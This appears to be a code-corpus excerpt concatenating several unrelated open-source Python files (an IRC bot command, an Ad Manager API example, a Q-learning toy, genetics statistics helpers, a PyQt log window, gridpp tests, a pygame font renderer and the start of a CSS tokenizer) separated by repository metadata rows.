@botologist.plugin.command("elo", threaded=True)
def get_elo(self, msg):
"""Get a player's ELO from qlranks."""
if len(msg.args) < 1:
return
if len(msg.args) > 1:
if "," in msg.args[1]:
modes = msg.args[1].split(",")
else:
modes = msg.args[1:]
return _get_qlr_elo(msg.args[0], modes)
else:
return _get_qlr_elo(msg.args[0])
| mit | 1,812,270,986,986,135,800 | 28.388889 | 86 | 0.58034 | false | 3.538462 | false | false | false |
Aloomaio/googleads-python-lib | examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py | 1 | 2609 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gets a reconciliation report's rows for line items that Ad Manager served.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the reconciliation report row.
RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE'
def main(client, reconciliation_report_id):
# Initialize appropriate service.
reconciliation_report_row_service = client.GetService(
'ReconciliationReportRowService', version='v201808')
# Create a statement to select reconciliation report rows.
statement = (ad_manager.StatementBuilder(version='v201808')
.Where(('reconciliationReportId = :reportId '
'AND lineItemId != :lineItemId'))
.WithBindVariable('lineItemId', 0)
.WithBindVariable('reportId', long(reconciliation_report_id)))
# Retrieve a small amount of reconciliation report rows at a time, paging
# through until all reconciliation report rows have been retrieved.
while True:
response = (
reconciliation_report_row_service
.getReconciliationReportRowsByStatement(
statement.ToStatement()))
if 'results' in response and len(response['results']):
for reconciliation_report_row in response['results']:
# Print out some information for each reconciliation report row.
print('Reconciliation report row with ID "%d", reconciliation source '
'"%s", and reconciled volume "%d" was found.\n' %
(reconciliation_report_row['id'],
reconciliation_report_row['reconciliationSource'],
reconciliation_report_row['reconciledVolume']))
statement.offset += statement.limit
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, RECONCILIATION_REPORT_ID)
| apache-2.0 | 5,258,400,101,180,364,000 | 39.765625 | 78 | 0.706401 | false | 4.167732 | false | false | false |
minimalparts/Tutorials | RLcafe/caffe.py | 1 | 3150 | import numpy as np
import random
environment = {
0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])],
1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])],
2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])],
3: [('EOS',[[4,-1,1]])],
7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])],
8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])]
}
#index to actions
i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'}
actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3}
#Initialising the Q matrix
q_matrix = []
for i in range(13):
q_matrix.append([0,0,0,0])
exit_states = [4,5,6,9,10,11,12]
def get_possible_next_actions(cur_pos):
return environment[cur_pos]
def get_next_state(action):
word = action[0]
possible_states = action[1]
fate = {}
for p in possible_states:
s = p[0]
r = p[1]
l = p[2]
fate[s] = [r,l]
next_state = np.random.choice(list(fate.keys()),1,[v[1] for k,v in fate.items()])
reward = fate[next_state[0]][0]
#print(next_state[0],reward)
return next_state[0],reward
def game_over(cur_pos):
return cur_pos in exit_states
discount = 0.9
learning_rate = 0.1
for _ in range(500):
print("\nEpisode ", _ )
# get starting place
cur_pos = 0
# while goal state is not reached
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
# select any one action randomly
action = random.choice(possible_actions)
word = action[0]
action_i = actions_to_i[word]
print(word)
# find the next state corresponding to the action selected
next_state,reward = get_next_state(action)
episode_return+=reward
# update the q_matrix
q_matrix[cur_pos][action_i] = q_matrix[cur_pos][action_i] + learning_rate * (reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i])
print(cur_pos,q_matrix[cur_pos],next_state)
# go to next state
cur_pos = next_state
print("Reward:",episode_return,"\n")
print(np.array(q_matrix).reshape(13,4))
print("Training done...")
print("\n***\nTesting...\n***\n")
# get starting place
cur_pos = 0
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
#print(possible_actions)
# select the *possible* action with highest Q value
action = None
if np.linalg.norm(q_matrix[cur_pos]) == 0:
action = random.choice(possible_actions)
else:
action = actions_to_i[possible_actions[0][0]]
c = 0
action_i = c
for a in possible_actions:
a_i = actions_to_i[a[0]]
if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]:
action = a_i
action_i = c
c+=1
action = possible_actions[action_i]
print(action[0])
next_state,reward = get_next_state(action)
episode_return+=reward
cur_pos = next_state
print("Return:",episode_return)
| mit | -4,122,450,842,618,977,300 | 30.148515 | 161 | 0.586459 | false | 2.902214 | false | false | false |
broadinstitute/cms | cms/power/power_func.py | 1 | 8625 | ## functions for analyzing empirical/simulated CMS output
## last updated 09.14.2017 [email protected]
import matplotlib as mp
mp.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import math
from scipy.stats import percentileofscore
###################
## DEFINE SCORES ##
###################
def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",):
'''adapted from run_likes_func.py'''
writefile = open(writefilename, 'w')
for score in ['ihs', 'nsl', 'delihh']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
for score in ['xpehh', 'fst', 'deldaf']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
writefile.close()
print("wrote to: " + writefilename)
return
###############
## REGION ID ##
###############
def get_window(istart, physpos, scores, windowlen = 100000):
window_scores = [scores[istart]]
startpos = physpos[istart]
pos = startpos
iscore = istart
while pos < (startpos + windowlen):
iscore += 1
if iscore >= len(scores):
break
window_scores.append(scores[iscore])
pos = physpos[iscore]
#print(str(pos) + " " + str(startpos))
return window_scores
def check_outliers(scorelist, cutoff = 3):
numscores = len(scorelist)
outliers = [item for item in scorelist if item > cutoff]
numoutliers = len(outliers)
percentage = (float(numoutliers) / float(numscores)) * 100.
return percentage
def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000):
'''
previous implementation: !!!! this is going to result in false positives whenever I have a small uptick right near the edge of the replicate
'''
#check window defined by each snp as starting point
rep_percentages = []
numSnps = len(physpos)
numWindows = 0
#get exhaustive windows and stop at chrom edge
for isnp in range(numSnps):
if physpos[isnp] + windowlen < totalchrlen:
numWindows +=1
else:
#print(str(physpos[isnp]) + "\t")
break
for iPos in range(numWindows):
window_scores = get_window(iPos, physpos, scores, windowlen)
percentage = check_outliers(window_scores, cutoff)
rep_percentages.append(percentage)
return rep_percentages
def merge_windows(chrom_signif, windowlen, maxGap = 100000):
print('should implement this using bedtools')
starts, ends = [], []
contig = False
this_windowlen = 0
starting_pos = 0
if len(chrom_signif) > 0:
for i_start in range(len(chrom_signif) - 1):
if not contig:
starts.append(chrom_signif[i_start])
this_windowlen = windowlen #unmerged, default
starting_pos = chrom_signif[i_start]
if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
#or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp
elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap):
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
else:
contig = False
if not contig:
windowend = chrom_signif[i_start] + windowlen
ends.append(windowend)
if contig: #last region is overlapped by its predecssor
ends.append(chrom_signif[-1] + windowlen)
else:
starts.append(chrom_signif[-1])
ends.append(chrom_signif[-1] + windowlen)
assert len(starts) == len(ends)
return starts, ends
##########################
## POWER & SIGNIFICANCE ##
##########################
def calc_pr(all_percentages, threshhold):
numNeutReps_exceedThresh = 0
totalnumNeutReps = len(all_percentages)
for irep in range(totalnumNeutReps):
if len(all_percentages[irep]) != 0:
if max(all_percentages[irep]) > threshhold:
numNeutReps_exceedThresh +=1
numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps)
if totalnumNeutReps != 0:
pr = numNeutReps_exceedThresh / totalnumNeutReps
else:
pr = 0
print('ERROR; empty set')
return pr
def get_causal_rank(values, causal_val):
if np.isnan(causal_val):
return(float('nan'))
assert(causal_val in values)
cleanvals = []
for item in values:
if not np.isnan(item) and not np.isinf(item):
cleanvals.append(item)
values = cleanvals
values.sort()
values.reverse()
causal_rank = values.index(causal_val)
return causal_rank
def get_cdf_from_causal_ranks(causal_ranks):
numbins = max(causal_ranks) #? heuristic
counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck
cdf = np.cumsum(counts)
return bins, cdf
def get_pval(all_simscores, thisScore):
r = np.searchsorted(all_simscores,thisScore)
n = len(all_simscores)
pval = 1. - ((r + 1.) / (n + 1.))
if pval > 0:
#pval *= nSnps #Bonferroni
return pval
else:
#print("r: " +str(r) + " , n: " + str(n))
pval = 1. - (r/(n+1))
#pval *= nSnps #Bonferroni
return pval
###############
## VISUALIZE ##
###############
def quick_plot(ax, pos, val, ylabel,causal_index=-1):
ax.scatter(pos, val, s=.8)
if causal_index != -1:
ax.scatter(pos[causal_index], val[causal_index], color='r', s=4)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize('6')
ax.set_ylabel(ylabel, fontsize='6')
#ax.set_xlim([0, 1500000]) #make flexible?
ax.yaxis.set_label_position('right')
#ax.set_ylim([min(val), max(val)])
return ax
def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000):
#print(allvals)
#get rid of nans and infs
#cleanvals = [item for item in allvals if not np.isnan(item)]
#allvals = cleanvals
allvals = np.array(allvals)
allvals = allvals[~np.isnan(allvals)]
allvals = allvals[~np.isinf(allvals)]
#allvals = list(allvals)
#print(allvals)
print("percentile for score = 10: " + str(percentileofscore(allvals, 10)))
print("percentile for score = 15: " + str(percentileofscore(allvals, 15)))
if len(allvals) > 0:
f, ax = plt.subplots(1)
ax.hist(allvals, bins=numBins)
plt.savefig(savefilename)
print('plotted to ' + savefilename)
return
def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True):
#neut_rep_scores.sort()
#print('sorted neutral scores...')
lastpos = 0
for chrom in range(1,23):
ichrom = chrom-1
if ichrom%2 == 0:
plotcolor = "darkblue"
else:
plotcolor = "lightblue"
if zscores == True:
#http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1
#Z SCORE cf SG email 103116
#pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]]
pvalues = []
for item in emp_scores[ichrom]:
if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant
pval = 1
else:
#print('scipy')
#sys.exit()
pval = scipy.stats.norm.sf(abs(item))
pvalues.append(pval)
#else:
# pval = get_pval(neut_rep_scores, item)
#pvalues.append(pval)
print("calculated pvalues for chrom " + str(chrom))
chrom_pos = range(lastpos, lastpos + len(pvalues))
logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues]
ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5)
lastpos = chrom_pos[-1]
else:
chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom]))
ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5)
lastpos = chrom_pos[-1]
return ax
def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom):
''' makes a figure more like in Karlsson 2013 instead of Grossman 2013'''
ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black")
ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal')
labels = ax.get_yticklabels()
ax.set_yticklabels(labels, fontsize=6)
ax.set_axis_bgcolor('LightGray')
return ax
| bsd-2-clause | 7,845,082,051,252,510,000 | 34.9375 | 143 | 0.679072 | false | 2.7976 | false | false | false |
geosohh/AnimeTorr | animetorr/manager/log.py | 1 | 7132 | # -*- coding: utf-8 -*-
"""
Log window.
"""
__author__ = 'Sohhla'
import os
from PyQt4 import QtGui, QtCore
from qt.log import Ui_Dialog as Ui_Log
from shared import constant
# TODO: Works, but waaaaaay too slow to load
class LogUpdater(QtCore.QObject):
"""
Updates the [Log window].
"""
finish = QtCore.pyqtSignal()
update_ui = QtCore.pyqtSignal(str)
def __init__(self, parent=None):
super(LogUpdater, self).__init__(parent)
self.log_paused = False
self.previous_log_file_size = 0
self.timer = None
self.log_lines_read = -1
self.html_log = ""
def start_timer(self):
"""
Starts timer. When it times out, will update the window again.
"""
self.timer = QtCore.QTimer()
# noinspection PyUnresolvedReferences
self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()...
self.timer.setSingleShot(True)
self.timer.start(1000)
def update_log(self):
"""
Reads the log file and updates the window.
"""
if not self.log_paused:
try:
log_size = os.path.getsize(constant.LOG_PATH)
except os.error:
log_size = -1
if self.previous_log_file_size!=log_size and log_size!=-1:
if self.previous_log_file_size > log_size:
self.log_lines_read = -1
if self.log_lines_read == -1:
self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">"
# reading log, converting into html
line_i = 0
for log_line in open(constant.LOG_PATH,'r'):
if line_i >= self.log_lines_read:
temp = log_line.split(" ## ")
asctime = temp[0].strip()
name = temp[1].strip()
levelname = temp[2].strip()
message = temp[3].strip()
color = "0000FF"
if levelname=="DEBUG":
color = "008000"
elif levelname=="INFO":
color = "000000"
elif levelname=="WARNING":
color = "B8860B"
elif levelname=="ERROR":
color = "FF0000"
elif levelname=="CRITICAL":
color = "8A2BE2"
temp = "<tr style=\"color:#"+color+";\">\
<td style=\"padding-right: 5px;\">"+asctime+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\
<td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\
<td style=\"padding-left: 5px;\">"+message+"</td></tr>"
self.html_log += temp
line_i+=1
self.log_lines_read = line_i
if self.log_paused:
self.finish.emit() # log paused, exiting thread
else:
# sending update to GUI
self.update_ui.emit(self.html_log+"</table>")
self.previous_log_file_size = log_size
self.start_timer()
else:
self.finish.emit()
def stop_thread(self):
"""
Stops log update.
"""
if self.timer is not None:
self.timer.stop()
self.finish.emit()
class WindowLog():
"""
Creates Log window.
"""
def __init__(self, parent_window):
self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint |
QtCore.Qt.WindowTitleHint |
QtCore.Qt.Window)
self.ui_log = Ui_Log()
self.ui_log.setupUi(self.dialog_log)
self.ui_log.button_pause.clicked.connect(self.pause_log)
self.ui_log.text_log.setHtml("Loading...")
self.log_paused = False
self.thread = None
self.log_updater = None
self.create_thread()
def show(self):
"""
Shows Log window.
"""
self.dialog_log.exec_()
def create_thread(self):
"""
Creates thread to update log.
"""
self.thread = QtCore.QThread(self.dialog_log)
self.log_updater = LogUpdater()
self.log_updater.moveToThread(self.thread)
self.log_updater.update_ui.connect(self.update_log_ui)
self.log_updater.finish.connect(self.thread.quit)
# noinspection PyUnresolvedReferences
self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()...
self.thread.start()
self.dialog_log.stop_thread.connect(self.log_updater.stop_thread)
def update_log_ui(self,new_html):
"""
Update window with new html.
:type new_html: str
:param new_html: ...
"""
self.ui_log.text_log.setHtml(new_html)
temp_cursor = self.ui_log.text_log.textCursor()
temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.ui_log.text_log.setTextCursor(temp_cursor)
self.dialog_log.repaint()
# noinspection PyArgumentList
QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents)
def pause_log(self):
"""
Stops window from being updated until the user clicks the button again.
"""
if self.log_paused:
self.log_paused = False
self.ui_log.button_pause.setText("Pause Log")
self.create_thread()
else:
self.log_paused = True
self.ui_log.button_pause.setText("Resume Log")
self.dialog_log.stop_thread.emit()
class WindowLogDialog(QtGui.QDialog):
"""
Overrides default QDialog class to be able to control the close window event.
"""
stop_thread = QtCore.pyqtSignal()
def __init__(self, window, parent=None, params=None):
super(WindowLogDialog, self).__init__(parent,params)
self.window = window
def closeEvent(self, _):
"""
When closing the window, stop the thread.
:type _: QCloseEvent
:param _: Describes the close event. Not used.
"""
if self.window.log_updater is not None:
self.stop_thread.emit() | gpl-2.0 | -3,731,463,448,882,287,600 | 35.768041 | 122 | 0.514582 | false | 4.129705 | false | false | false |
metno/gridpp | tests/neighbourhood_quantile_fast_test.py | 1 | 5647 | from __future__ import print_function
import unittest
import gridpp
import numpy as np
lats = [60, 60, 60, 60, 60, 70]
lons = [10,10.1,10.2,10.3,10.4, 10]
"""Simple check
20 21 22 23 24
15 16 17 18 19
10 11 12 13 nan
5 6 7 nan 9
0 1 2 3 4
"""
values = np.reshape(range(25), [5, 5]).astype(float)
values[1, 3] = np.nan
values[2, 4] = np.nan
values = np.array(values)
class Test(unittest.TestCase):
def test_invalid_arguments(self):
"""Check that exception is thrown for invalid arguments"""
field = np.ones([5, 5])
halfwidth = -1
quantiles = [-0.1, 1.1, np.nan]
thresholds = [0, 1]
for quantile in quantiles:
with self.assertRaises(ValueError) as e:
gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
def test_nan_quantile(self):
field = np.ones([5, 5])
halfwidth = 1
quantile = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output)
def test_empty(self):
for quantile in np.arange(0.1,0.9,0.1):
for num_thresholds in [1, 2]:
thresholds = gridpp.get_neighbourhood_thresholds(values, num_thresholds)
output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds)
self.assertEqual(len(output.shape), 2)
self.assertEqual(output.shape[0], 0)
self.assertEqual(output.shape[1], 0)
def test_single_threshold(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds)
np.testing.assert_array_equal(output, np.zeros([3, 3]))
def test_two_thresholds(self):
"""Checks what happens when a single threshold is provided"""
thresholds = [0, 1]
field = np.reshape(np.arange(9), [3, 3])
for halfwidth in [0, 1, 2]:
output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds)
self.assertTrue(((output >= 0) & (output <= 1)).all())
def test_missing(self):
empty = np.zeros([5, 5])
empty[0:3, 0:3] = np.nan
thresholds = [0, 1]
output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds)
self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all())
def test_quantile(self):
thresholds = gridpp.get_neighbourhood_thresholds(values, 100)
output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds))
self.assertEqual(output[2][2], 12) # Should be 12.5
self.assertEqual(output[2][3], 12.5) # Should be 13
output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds))
self.assertTrue(np.isnan(np.array(output)).all())
output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds))
self.assertTrue((np.array(output) == 0).all())
output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1))
self.assertEqual(output[2][2], 12.5)
self.assertEqual(output[2][3], 13)
self.assertEqual(output[0][4], 4)
def test_3d(self):
np.random.seed(1000)
values = np.random.rand(200, 200)
values3 = np.zeros([200, 200, 5])
for i in range(5):
values3[:, :, i] = values
halfwidths = [0, 1, 5]
quantile = 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
for halfwidth in halfwidths:
output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds)
output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds)
np.testing.assert_array_almost_equal(output_2d, output_3d)
def test_varying_quantile(self):
""" For now check that this runs """
values = np.array([[0, 1], [2, 3], [4, 5]])
halfwidth = 1
quantiles = np.ones(values.shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_varying_quantile_3d(self):
""" For now check that this runs """
np.random.seed(1000)
values = np.random.rand(100, 50, 2)
halfwidth = 1
quantiles = np.ones(values[:, :, 0].shape) * 0.5
thresholds = [0, 0.25, 0.5, 0.75, 1]
gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)
values = np.nan *np.zeros(values.shape)
np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds))
def test_all_same(self):
""" Check that min and max of an neighbourhood with all identical values is correct """
field = np.zeros([10, 10])
thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]
for quantile in [0, 0.001, 0.999, 1]:
with self.subTest(quantile=quantile):
output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds)
np.testing.assert_array_almost_equal(output, field)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 6,977,101,496,407,008,000 | 39.335714 | 132 | 0.606517 | false | 3.290793 | true | false | false |
Fenixin/yogom | tryengine/fontrenderer.py | 1 | 8186 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of TryEngine.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''
Created on 20/03/2014
@author: Alejandro Aguilera Martínez
@email: [email protected]
Module to render fonts with different effects.
See FontRenderer for help.
'''
from itertools import product
from math import ceil
import pygame as pg
from pygame.font import Font
from pygame import Surface
from pygame.transform import laplacian
#TODO: Transparent things aren't handled properly!
# Choosing the same color as the transparent color
# used internally will do very ugly stuff
class FontRenderer(object):
'''
Object to render text of any size.
Rendering text is made through layers. Layer are passed to
render with a list. You can render as many layer as you want.
Here it is an example with all the layer types:
layers = [
('external_border',{'width':2, 'color':VIOLET}),
('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}),
('normal',{'color':WHITE}),#
('internal_border', {'color':(GREEN)}),
('textured',{'image':image_texture})
]
'''
TRANSPARENT = (255, 0, 255)
def __init__(self, font_file, antialias=False):
'''
Constructor
'''
if font_file:
self.font_file = font_file
else:
self.font_file = pg.font.get_default_font()
self._font_sizes = {}
self.antialias = antialias
# Parameters to create images
self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize()
self.IMG_FLAGS = pg.HWSURFACE
def _add_fontsize(self, filename, size):
""" Add a font size renderer to _font_sizes. """
self._font_sizes[size] = Font(filename, size)
def __getitem__(self, size):
""" Return the proper font size. """
try:
return self._font_sizes[size]
except KeyError:
self._add_fontsize(self.font_file, size)
return self._font_sizes[size]
def _get_new_surface(self, text, pixel_size):
""" Return a surface with the needed size for the text."""
img = Surface(pixel_size, self.IMG_FLAGS)
img.fill(self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
return img
def size(self, text, size, layers = []):
""" Return the image size in pixels.
This take into account all the layer given
and calculate the correct image size.
"""
x, y = self[size].size(text)
for layer in layers:
if layer[0] == 'shadows':
mx = my = 0
for t in layer[1]['positions_and_colors']:
mx = max(abs(t[0][0]), mx)
my = max(abs(t[0][1]), my)
x += mx*2
y += my*2
elif layer[0] == 'external_border':
width = layer[1]['width']
x += width*2
y += width*2
return (x,y)
def _render_internal(self, text, size, color, bg_color):
"""
Wrapper
"""
# For fastest blitting set hwsurface and the same
# bit depth as the display surface.
# Also for your
# own sanity, remember that rendering fonts will give
# you a 8bit image and, sometimes, this will give
# unexpected results
# when blittings in a 32bits surface
img = self[size].render(text, self.antialias, color, bg_color)
return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS)
def render(self, text, size, bg_color, bg_transparent, layers):
""" Render text through the defined layers. """
pixel_size = self.size(text, size, layers)
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
result = self._get_new_surface(text, pixel_size)
result.fill(bg_color)
if bg_transparent:
result.set_colorkey(bg_color)
# Create all the images and blit them together
images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers]
[result.blit(image, (0,0)) for image in images]
return result
def _fill_image(self, dest, filler, blendmode = 0):
""" Fills dest surface with filler repeating if necesary. """
ds = dest.get_size()
fs = filler.get_size()
for x in xrange(int(ceil(ds[0]/float(fs[0])))):
for y in xrange(int(ceil(ds[1]/float(fs[1])))):
dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode)
print x,y
"""
Layers
"""
def _textured(self, text, size, pixel_size, offset, image = None):
""" Render a textured font.
Transparent colors in the texture will be ignored.
"""
BG = (0,0,0)
FG = (255,255,255)
blendmode = pg.BLEND_MULT
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
self._fill_image(temp, image, blendmode)
return temp
def _normal(self, text, size, pixel_size, offset, color = None):
""" Return a normal render of the text. """
s = self._get_new_surface(text, pixel_size)
img = self._render_internal(text, size, color, self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
s.blit(img, offset)
return s
def _shadows(self, text, size, pixel_size, offset, positions_and_colors):
""" Add 'shadows' with different colors. """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
f = self._render_internal
s = self._get_new_surface(text, pixel_size)
transparent = self.TRANSPARENT
for pos,color in positions_and_colors:
shadow = f(text, size, color, transparent)
shadow.set_colorkey(transparent)
n_pos = (pos[0]+offset[0], pos[1]+offset[1])
s.blit(shadow, n_pos)
return s
def _external_border(self, text, size, pixel_size, offset, width = None, color = None):
""" Add an external border (outside of the font). """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
l = []
for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)):
l.append( ((x,y),color) )
return self._shadows(text, size, pixel_size, offset, l)
def _internal_border(self, text, size, pixel_size, offset, color = None):
""" Add an internal border (inside of the font). """
# Use very different colors to get a very sharp edge
BG = (0,0,0)
FG = (255,255,255)
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
temp = laplacian(temp)
temp.set_colorkey(FG)
result = self._get_new_surface(text, pixel_size)
result.fill(color)
result.blit(temp, (0,0))
result.set_colorkey(BG)
return result
| gpl-3.0 | -3,237,735,693,081,282,000 | 32.137652 | 107 | 0.5719 | false | 3.688598 | false | false | false |
kgn/cssutils | src/cssutils/tokenize2.py | 1 | 9735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""New CSS Tokenizer (a generator)
"""
__all__ = ['Tokenizer', 'CSSProductions']
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from cssproductions import *
from helper import normalize
import itertools
import re
_TOKENIZER_CACHE = {}
class Tokenizer(object):
"""
generates a list of Token tuples:
(Tokenname, value, startline, startcolumn)
"""
_atkeywords = {
u'@font-face': CSSProductions.FONT_FACE_SYM,
u'@import': CSSProductions.IMPORT_SYM,
u'@media': CSSProductions.MEDIA_SYM,
u'@namespace': CSSProductions.NAMESPACE_SYM,
u'@page': CSSProductions.PAGE_SYM,
u'@variables': CSSProductions.VARIABLES_SYM
}
_linesep = u'\n'
unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub
